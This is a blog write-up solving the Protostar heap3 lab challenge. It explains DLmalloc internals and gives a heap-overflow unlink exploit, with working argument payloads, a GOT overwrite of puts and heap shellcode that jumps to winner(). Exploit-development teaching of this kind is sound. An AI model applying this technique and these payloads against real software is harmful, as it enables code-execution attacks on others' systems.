Protostar Exploit Challenges Heap3 Solution – Exploiting DLMalloc

Introduction

This was easily the hardest challenge for me in the series so far. It took me quite a while with a lot of background reading to fully understand everything going on. I strongly encourage you to check the sources out and spend the time. My biggest piece of advice is when it comes to the disassembly, try doing it yourself. It’s very good practice and will help you build a conceptual understanding of what is going on. Good luck.

Source Credit

This explanation on DLmalloc is a paraphrase of Carnegie Mellon Software Engineering Institutes lecture on Dynamic Memory Management: DLmalloc Secure Coding in C and C++ by Robert C. Seacord. You can download the original presentation here. In fact I suggest you do because there’s a lot of other good stuff in there ;-p. I did my best to clarify at the sections I thought were a bit confusing on my first pass.

Doug Lea’s Malloc (DLmalloc)

DLmalloc is a specific implementation of malloc which provides heap memory management where chunks are either allocated or free.

The Header

Below is a depiction of the heap headers used by DLmalloc.

figure1

Figure from Software Engineering Institute of Carnegie Mellon

There are a couple of points that at first may be confusing. In an allocated chunk the first 4 bytes are either the size of the previous chunk IF that previous chunk is free or it is the last 4 bytes of data if the previous byte is allocated.

Free Chunks

In DLmalloc free chunks are organized into double-linked lists. They each contain a forward pointer and a backward pointer to the next free chunk and the previous free chunk. The chunk size is stored in the last four bytes of a free chunk which allows adjacent free chunks to be consolidated to avoid memory fragmentation. Source

PREV_INUSE Bit

The PREV_INUSE bit is short for previous in use. It is stored in the lowest bit of the chunk size field. If the PREV_INUSE bit is clear, then the size/data field at the beginning of the header contains the size of a free chunk of memory. Otherwise it contains user data. Chunk sizes will always be a multiple of two so the low order bit is never used.

DLmalloc Free Lists

Free chunks are arranged in circular doublelinked lists or bins. Each double-linked list has a head that contains forward and back pointers to the first and last chunks in the list. The forward pointer in the last chunk of the list and the back pointer of the first chunk of the list both point to the head element. When the list is empty, the head’s pointers reference the head itself.

figure2

Image Source – Page 63

Bins

Each bin holds chunks of a specific size so that a chunk of that size may be found quickly. For smaller sizes, the bin contains chunks of one size. As the size increases, the range of sizes in a bin also increases. For bins with different sizes, chunks are arranged in descending size order.

DLmalloc

DLmalloc coalesces chunks during free operations. If the chunk located immediately before the chunk to be freed is free, it is taken off its double-linked list and consolidated with the chunk being freed. If the chunk located immediately after the chunk to be freed is free, it is taken off its double-linked list and consolidated with the chunk being freed. The resulting consolidated chunk is placed in the appropriate bin.

 Buffer Overflow

The technique we will use to defeat this challenge was originally written by Solar Designer. It allows you to manipulate the chunk headers of memory to cause the unlink macro to write four bytes to an arbitrary location.

The unlink macro contains the following code:

#define unlink(P, BK, FD) {
FD=P->fd;
BK=P->bk;
FD->bk=BK;
BK->fd = FD;
}

This can be a bit confusing at first. Here is a diagram of what is going on and then I will explain:

figure1

Image Source – Page 70

Step 1) We’ll take the second chunk’s forward pointer and assign it to the variable FD.
Step 2) Take the second chunk’s backward pointer and assign it the variable BK.
Step 3) Assign the second chunk’s backward pointer to the backward pointer of the third chunk. Thus the third chunk’s backward pointer now points to the first chunk.
Step 4) Assign the second chunk’s forward pointer to the forward pointer of the first chunk. Now the first chunk’s pointer points to the third chunk.

Our Code

#include stdlib.h;
#include unistd.h;
#include string.h;
#include sys/types.h;
#include stdio.h;

void winner()
{
printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
char *a, *b, *c;

a = malloc(32);
b = malloc(32);
c = malloc(32);

strcpy(a, argv[1]);
strcpy(b, argv[2]);
strcpy(c, argv[3]);

free(c);
free(b);
free(a);

printf("dynamite failed?\n");
}

We can immediately see that lines 20-22 all have buffer overflow issues. The way things are ordered, this means we can control the heap headers for either b or c.

First our program frees the third chunk. This is followed by the second chunk. If the second chunk is unallocatted, it will attempt to consolidate the third and second chunks to make one larger free chunk. To determine if the second chunk is unallocated, free chucks the PREV_INUSE bit of the third chunk.

Below is a picture of what our overwrite looks like as the first free is completing at the time of our attack.

figure2

Below is a diagram of what our malicious payload will look like. You don’t need to understand it just yet, but we’ll be referencing it later. Before you look at it, let me clarify something. In the picture it looks like the second chunk is already free. That is not the case. We are going to trick DLMalloc into thinking it is free during the first call to free.

figure3

Image Source – Page 73

Getting the Size of a Chunk During a Request from Malloc

When a user requests X number of bytes of dynamic memory via malloc(), realloc(), or calloc(), it calls request2size() to convert the number of bytes requested (X) to a usable size of Y. This usable size accounts for the the requested bytes and all the overhead associated with it. If you want to know exactly what the algorithm looks like check out page 76 of this. The short version is, request2size() returns the first multiple of 8 bytes greater than or equal to X+4. The 4 bytes is the size of the size field.

We can see an example of this by looking at the heap of our own code. This was taken after I ran the command: run $(python -c ‘print “A”*31’) $(python -c ‘print “B”*31’) $(python -c ‘print “C”*31’)  directly before the first call to free.

figure4

We can see here that our allocated space is 40 bytes. This makes sense. Recall that our formula is the first multiple of 8 bytes greater than or equal to the number of requested bytes plus 4. The 0x29 is the size field for the current chunk and the 4 bytes before that is the size field for the previous chunk. You may think that 0x29 != 40. Recall that the last bit is used to mark whether the previous chunk is allocated or not. If you have been reading up to this point, you may also be a bit confused because we said if a chunk is allocated then those bytes should be data. That is actually implementation specific. It appears in the implementation of DLmalloc we are looking at, a chunk is always followed by a size field whether it is allocated or not.

Now let’s take a look at memory after the frees happen:

figure5

Now, if you’re like me you are a bit confused by this. You’ll notice that both our chunk of As and our chunk of Bs have only one pointer directly after the size. That one pointer is a forward pointer to the next block. Remember how I mentioned bins before? That’s what you are seeing here. You are seeing a particular implementation called fastbinning. You can read more here.

Fast Binning

Chunks of memory in fastbins are typically less than 60 bytes, but with a configurable amount up to 80. They are not coalesced with surrounding chunks on a call to free, they are not sorted, and only have single linked lists instead of double linked lists.

In the below diagram, the fastbin number is the index into the array of fastbin’s, the ‘holds chunk sizes’ indicates the range of sizes that the bin will hold and ‘real chunk size’ is the actual size after metadata and alignment of the block being freed. Source

figure6

Image Source

Unfortunately, we can’t do much with this fastbinning code… but what if we could trick our program into thinking that our chunk size was too large for a fastbin?

Fooling the Heap Algorithm

figure1_new

This is a partial dump of the free function examined in IDA Pro. You can see this same thing by disassembling the free function and looking around free+52. The portion of interest is the first jump if below. If we were to take that jump, we end up going to the code for the handling of non-fastbin chunks. To take the jump, whatever is in eax must be smaller than our chunk size. I placed a breakpoint and checked the size to determine it is 0x49=73. To test this I used the following code: run $(python -c ‘print “A”*36 + “\x50″‘) $(python -c ‘print “B”*31’) $(python -c ‘print “C”*31’). This writes a hex value of 50 to the size field of B chunk. Sure enough this worked and lead down the branch to the right. I placed a breakpoint at 0x08049899 (free+117) and I hit it with this input.

figure2_new

This is the command I ran along with what chunk 3 now looks like. You can see that we overwrote the previous block size with Bs, the size of chunk 3 is now 0x50, and we still have our Cs.

Next, we will evaluate the following code blocks.

figure3_new

The first block is responsible for getting some information about the next chunk and then checking if the previous chunk is allocated. If it is not allocated we take the bottom code block. Recall that in this case it thinks the size is 0x50, which means the previous chunk is not allocated and thus, we go to the bottom code block.

Take some time to read through the code of the bottom code block. What you may notice is that this is the unlinking algorithm running. We are unlinking the third block because it believes that block to already be free, even though in our case, it is not. Most importantly, at  the bottom is a write to an arbitrary memory location we can control.

We do this by overwriting the forward pointer with the location we want to write to -12 (I’ll explain the minus 12 in a second) and the backward pointer with whatever we want to write. Let’s look at the following code:

mov [ebp+FD], eax ; store prev_forward_ptr
mov eax, [ebp+actual_mem_to_free] ; EAX=prev_actual_mem_to_free
mov eax, [eax+0Ch] ; EAX=previous backward pointer
mov [ebp+BK], eax ; store prev_bckward_ptr
mov eax, [ebp+FD] ; EAX=prev_fwd_ptr
mov edx, [ebp+BK] ; EDX=prev_bckward_ptr
mov [eax+0Ch], edx ; current_bckward_ptr=points to prev_prev_chunk
mov eax, [ebp+BK] ; EAX=prev_bckward_ptr
mov edx, [ebp+FD] ; EDX=prev_fwd_ptr
mov [eax+8], edx ; prev_prev_fwd_ptr=points to current chunk

Let’s pretend we control everything, so it would instead look like this:

mov [ebp+FD], eax ; store ptr_write_location
mov eax, [ebp+actual_mem_to_free] ; EAX=prev_actual_mem_to_free
mov eax, [eax+0Ch] ; EAX=data_to_write
mov [ebp+BK], eax ; store data_to_write
mov eax, [ebp+FD] ; EAX=ptr_to_write_location
mov edx, [ebp+BK] ; EDX=data_to_write
mov [eax+0Ch], edx ; [write_location+0xc]=data_to_write
;The above line treats our data_to_write like a pointer
;Warning: it writes a bad byte at offset 0xC!
mov eax, [ebp+BK] ; EAX=data_to_write
mov edx, [ebp+FD] ; EDX=ptr_write_location
mov [eax+8], edx ; [data_to_write + 0x8]=write_location

What you should get out of the above code is that we are able to perform an arbitrary write to a location of our choosing in the last line. Now the problem is that when we write to the current backward pointer or at least what the program thinks is the current backward pointer, we are actually writing a garbage byte at our target location.

Exploitation

I explained in principle how the attack worked, but now we must actually get control of those fields in order to perform the attack.

DLmalloc uses the previous size field to calculate the location of the header for the second chunk. We saw this at free+188 where it made our previous chunk size negative and then added it to the address of the current block. What would be most convenient would be to put 32 into this field however, that won’t work. The reason being is that we would have to write 0x00000020. Recall, we are putting this in via strings and those bytes would be interpreted as null bytes and thus terminate our input so that’s no good. However, we still have options. What we can do is enter the value 0xfffffffc, IE -4.  Instead of moving backward towards the previous chunk, we will advance forward. From there we can create a fake chunk to serve our purposes.

If we use a value of negative four, it will then think that the chunk size field is the previous chunk size field. From there we can create a fake heap header consisting of the following:

-4 <—- Previous chunk size
0x50 <—- Current chunk size / After jump this becomes previous chunk size
4 garbage bytes <——After jump this is current chunk size
forward ptr
backward ptr
free space
free space size

Here’s another picture to help clarify:

figure10

Image Source – Page 82

Now we must decide what to do with our arbitrary write. Because our arbitrary write will also insert some random byte at offset +0xC, I originally decided to just overwrite the return address of the call to free. However, that isn’t going to work as the return address is 0xbffff72c. Subtract 12 from it and you get 0xbffff720… which has a null byte at the end rendering it unusable.

Instead I decided to do a GOT table overwrite for puts. The address of winner is at 0x08048864 and the address of puts is at 0x0804b128 for its GOT entry.

I ran the following:

/opt/protostar/bin/heap3 $(python -c ‘print “A”*4’) $(python -c ‘print “B”*32 + “\xfc\xff\xff\xff” + “\x50″‘) $(python -c ‘print “CCCC” + “\x1c\xb1\x04\x08” + “\x64\x88\x04\x08″‘)

Unfortunately, this also caused a segfault. On the bright side our GOT overwrite was successful.

Program received signal SIGSEGV, Segmentation fault.
0x08049906 in free (mem=0x804c058) at common/malloc.c:3638
3638 in common/malloc.c
(gdb) x/x 0x0804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x08048864

The question is why did our program segfault? It segfaulted on the following:

(gdb) x/i $eip
0x8049906 <free+226>: mov DWORD PTR [eax+0x8],edx

That’s the last line of our unlinking procedure! What’s happening here is that the unlinking procedure is trying to write to the winner function, which it can’t do because the winner function is part of the text section. This means we can only write an address to the GOT that is both writeable and executable. Thankfully, we control exactly one such section… the heap! We control what is in the first chunk. We could write some code in the first heap section to call the winner function and jump to it. Our first chunk begins at address 0x0804c008. Let’s try that address and see if it works.

It does get past where we were stuck, but instead crashes again:

Program received signal SIGSEGV, Segmentation fault.
0x08049951 in free (mem=0x804c058) at common/malloc.c:3648
3648 in common/malloc.c
(gdb) x/i $eip
0x8049951 <free+301>: mov DWORD PTR [eax+0xc],edx
(gdb)

Up until now, we’ve been working on freeing the second chunk and coalescing it with the third? Recall a couple of code blocks ago we also calculated the header information of the chunk after the third. Of course, there isn’t one, but we’ve made the program believe there is a theoretical 4th chunk. Now it has come back to haunt us. The program is trying to do the same thing we just did with the second chunk to an invisible 4th chunk and it is causing the program to crash.

I did some reversing on the following code block:

figure_4new

Our code crashes in the second block you see where the unlink function for the next block is executed. We could use that to perform a second write, but we don’t need to do that. Now, if you look in the first block you’ll see it calculate the address of the next chunk and then save the PREV_ALLOC bit. What I did was calculate the offset from the end of our output in the third block to where the size of the next block would be and I wrote a 1 to it. In this way we WILL take the jump and we’ll skip the unlink function altogether thereby bypassing the problem.

run $(python -c ‘print “A”*31’) $(python -c ‘print “B”*32 + “\xfc\xff\xff\xff” + “\x50″‘) $(python -c ‘print “CCCC” + “\x1c\xb1\x04\x08” + “\x08\xc0\x04\x08” + “D”*64 + “\x01″‘)

I ran the program again and it indeed did bypass the block in question. Even more pleasantly, it crashed at 0x0804c02b, which is awfully close to where I told it to jump. This means that we’re reaching our target shellcode location.

I checked this by putting a breakpoint on puts in main and then stepping into it. Sure enough, we landed in the heap.

figure_5new

 

Now we need to come up with a way to get out of the heap and into winner. I used this website to create a push 0x08048864, ret to get from the heap to the winner function. So all in all my code looks like this:

run $(python -c ‘print “\x90″*4 + “\x68\x64\x88\x04\x08\xc3″‘) $(python -c ‘print “B”*32 + “\xfc\xff\xff\xff” + “\x50″‘) $(python -c ‘print “CCCC” + “\x1c\xb1\x04\x08” + “\x0c\xc0\x04\x08” + “D”*64 + “\x01″‘)

You may be curious how the above code breaks out. The \x68 is the opcode for push followed by the address in reverse byte order. \xc3 is the opcode for ret. Here’s what it looks like in memory:

figure5_new

Finally here’s the program running victoriously.

figure6_new

3 thoughts on “Protostar Exploit Challenges Heap3 Solution – Exploiting DLMalloc

  1. Pingback: Protostar Exploit Challenges Final 2 Solution » Grant Curell

  2. Reply

    Anonymous

    Thanks this writeup was really helpful and detailed.

    1. Reply

      grantcurell@gmail.com Post author

      I’m glad it helped!

Leave a Reply